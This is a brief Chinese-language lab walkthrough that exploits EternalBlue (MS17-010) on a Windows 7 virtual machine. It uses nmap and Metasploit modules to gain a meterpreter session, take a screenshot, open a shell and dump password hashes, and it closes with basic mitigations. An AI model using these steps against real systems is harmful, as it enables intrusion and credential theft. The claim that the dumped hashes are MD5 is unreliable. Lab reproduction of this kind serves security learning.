1、准备工作
靶机:win7(ip:192.168.61.132)
攻击机:kail2023(ip:192.168.61.131)
工具:nmap、msfconsole
注意:需要关闭win7的防火墙nmap扫描到445端口
2、漏洞复现
首先保证两台主机可以ping通
(ctrl+z可以提前结束进程 否则会一直输出)
接下来使用nmap去扫描端口
nmap 192.168.61.132
检测到445端口可能存在永恒之蓝漏洞
打开msfconsole
查询ms17-010模块
search ms17-010
加载扫描模块1并查看配置(auxiliary为辅助模块)
use 1
show options
发现rhost未配置主机,配置目标主机
set rhosts 192.168.61.132
继续使用永恒之蓝攻击模块(模块2)
use 2
并设置攻击载荷
set payload
设置rhosts
使用exploit开始攻击
成功运行会产生meterpreter字样
使用screenshot获取靶机当前页面照片
根据路径找到照片
查看权限:getuid
拿到shell
使用hashdump并且使用MD5解码即可知道用户密码
还很多方法就不一一罗列了
解决方法
关闭445端口
打开防火墙,安装市面上的一些杀软